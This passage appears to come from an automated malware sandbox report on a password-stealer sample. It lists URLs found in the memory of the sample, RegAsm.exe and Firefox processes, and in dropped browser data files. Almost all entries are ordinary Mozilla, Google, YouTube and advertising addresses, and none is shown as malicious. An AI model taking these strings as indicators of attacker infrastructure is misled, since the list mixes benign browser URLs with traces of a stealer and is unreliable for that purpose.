Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulXULStore:
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulconnectedCallback/this._mutationObserve
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulnsPrompter:
Source: firefox.exe, 00000033.00000003.2826993016.0000026F4F68C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819398885.0000026F4F68C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2815303060.0000026F4F68C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulp
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/TelemetryTimesta
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: firefox.exe, 00000031.00000002.4827029907.0000020345F22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.sakkal.com
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.tiro.com
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.typography.netD
Source: firefox.exe, 00000031.00000002.4827029907.0000020345F22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: mozilla-temp-41.51.dr	String found in binary or memory: http://www.videolan.org/x264.html
Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, 00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2594202655.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/video/
Source: firefox.exe, 00000031.00000002.4828503772.0000020346300000.00000002.00000001.00040000.00000016.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2512730909.0000026F4D051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr, scriptCache-child-new.bin.51.dr	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000033.00000003.2953002172.0000026F5B029000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2636245903.0000026F5193D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com&j
Source: firefox.exe, 00000033.00000003.2636245903.0000026F5193D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2969066007.0000026F5BADF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2962386153.0000026F5B8EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/3
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/n
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2471214437.0000000001730000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000029.00000002.2476454883.000001D9BA7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.comC:
Source: firefox.exe, 00000029.00000002.2476454883.000001D9BA7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.comN5
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.comin
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.cominD
Source: firefox.exe, 00000033.00000003.2993278709.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.youtube.com/RotateCookiesPage?origin=https://www.youtube.com&yt_pid=
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ad.doubleclick.net/ddm/trackclk/N444803.2428500DBMSITEID/B30029229.368252041;dc_trk_aid=
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ad.doubleclick.net/ddm/trackimp/N1957659.127733GOOGLE-YOUTUBE/B29940965.366940103;dc_trk_aid
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ad.doubleclick.net/ddm/trackimp/N444803.2428500DBMSITEID/B30029229.368252041;dc_trk_aid=
Source: firefox.exe, 00000033.00000003.2641907380.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2820309508.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2815640094.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674562682.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-users/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid=
Source: firefox.exe, 00000033.00000003.2640984970.0000026F4E9A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640984970.0000026F4E9CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: chromecache_931.22.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/spf/2.4.0/LICENSE
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000033.00000003.2900531454.0000026F4BC57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000031.00000002.4727131464.0000020338F15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://basket.mozilla.org/news/subscribe/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://basket.mozilla.org/news/subscribe_sms/
Source: scriptCache-child-new.bin.51.dr	String found in binary or memory: https://basket.mozilla.org/subscribe.json
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000033.00000003.2795566806.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2977225357.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2688000475.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: firefox.exe, 00000033.00000003.2795566806.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2977225357.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2688000475.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: firefox.exe, 00000033.00000003.2540660558.0000026F4FE41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2638535851.0000026F4FE41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975557801.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975355331.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975557801.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975355331.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975557801.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975355331.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975557801.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975355331.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000033.00000003.2957224507.0000026F5B2D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975557801.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2975355331.0000026F5C6E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000033.00000003.2975443318.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2974984972.0000026F5C6D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Web Data.36.dr, QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Web Data.36.dr, QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2512730909.0000026F4D051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000033.00000003.2795566806.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2977225357.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2688000475.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: firefox.exe, 00000033.00000003.2795566806.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2977225357.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2688000475.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp, 6D89348819C8881868053197CA0754F36784BF5F.51.dr	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000031.00000002.4727131464.0000020338F0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4727131464.0000020338F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2933058687.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: LICENSE.36.dr	String found in binary or memory: https://creativecommons.org/.
Source: LICENSE.36.dr	String found in binary or memory: https://creativecommons.org/compatiblelicenses
Source: B3B0E252350B538B85FDCD7986C1EF6D495A2570.51.dr, 0278A230C96F3CCD360EFD91F1D95D1D65C5FACB.51.dr, BD9CCF8167873D4A01DE1EEBD3F3CF68BFCB4751.51.dr, 257FC89A8CE7665B22FB6627E176B74644190734.51.dr, F4CB304FD4D03C53B6509A69A0C573AE3FFCA86F.51.dr, E210649FB7358F58475F6B3C24C6B61E88CBB00B.51.dr, C050C2250D3FDC6BFC8EFB79D6C18D4D0402B6F0.51.dr, EA86BF7019DD8098795FFCEA42753555A3DB9D39.51.dr, 3892996081ABC95E471CC4B3AE0A858E7A52E706.51.dr, 58A3645EA63E34F9D1E58BD69BF9287063486081.51.dr, C5658B5685DF72437813C7814625E1F931F14709.51.dr, F3373B24AB67D455B207FA78D3E7D012A32DE837.51.dr, B20635A9E3239966DF1AF8702BD403FE7FB90005.51.dr, 953DC40B3D4543FF21CAD0E01B081EBB46362B01.51.dr, 599ED0EF31CAD4FEF69926D3A322C3A0364B4B00.51.dr	String found in binary or memory: https://csp.withgoogle.com/csp/apps-themes
Source: B3316860430DA0966649580110E85D2FFB7B5A61.51.dr	String found in binary or memory: https://csp.withgoogle.com/csp/bcfae741e379a885f2ab2cf83ebe6d32/mr
Source: B3B0E252350B538B85FDCD7986C1EF6D495A2570.51.dr, 0278A230C96F3CCD360EFD91F1D95D1D65C5FACB.51.dr, BD9CCF8167873D4A01DE1EEBD3F3CF68BFCB4751.51.dr, 257FC89A8CE7665B22FB6627E176B74644190734.51.dr, F4CB304FD4D03C53B6509A69A0C573AE3FFCA86F.51.dr, E210649FB7358F58475F6B3C24C6B61E88CBB00B.51.dr, C050C2250D3FDC6BFC8EFB79D6C18D4D0402B6F0.51.dr, EA86BF7019DD8098795FFCEA42753555A3DB9D39.51.dr, 3892996081ABC95E471CC4B3AE0A858E7A52E706.51.dr, 58A3645EA63E34F9D1E58BD69BF9287063486081.51.dr, C5658B5685DF72437813C7814625E1F931F14709.51.dr, F3373B24AB67D455B207FA78D3E7D012A32DE837.51.dr, B20635A9E3239966DF1AF8702BD403FE7FB90005.51.dr, 953DC40B3D4543FF21CAD0E01B081EBB46362B01.51.dr, 599ED0EF31CAD4FEF69926D3A322C3A0364B4B00.51.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/apps-themes
Source: DC990C2E9B8378070C100B26A893DB305F84C5FA.51.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/static-on-bigtable
Source: firefox.exe, 00000033.00000003.2996055360.0000026F5DA0B000.00000004.00000800.00020000.00000000.sdmp, 70DE259D3055F51A1BEBD035A0E461EC8E9213A5.51.dr, 281D3362FC8DAA6BD8595A1C942DD405542AD365.51.dr, B41E3D0BA051DAFDC3F262CC45C5AE9165BC9508.51.dr, D550D57BCFA88C4195E78095A742FAC7693FC54F.51.dr, 48D71C745420E717A699F4CC6847C17B6C743A51.51.dr, A988D8F5B0BF56AA1942EC62AFDF51C05C82139B.51.dr, 33200725926A095B3A48EB9ABD6821C7F895DF65.51.dr, AF10D6A6EDDDEAF586DD225969745155C8322254.51.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube
Source: firefox.exe, 00000033.00000003.2994770537.0000026F5DBE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube-main-app-web-scs-key
Source: 3D2EE65213655611AE063776EA786EF2A8F7901B.51.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube-marketing
Source: 2cc80dabc69f58b6_0.36.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/youtube_main
Source: firefox.exe, 00000033.00000003.2994770537.0000026F5DBE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/youtube-main-app-web-scs-key
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000033.00000003.2981976697.0000026F5D82C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000031.00000002.4780134384.0000020345355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2698788329.0000020345366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
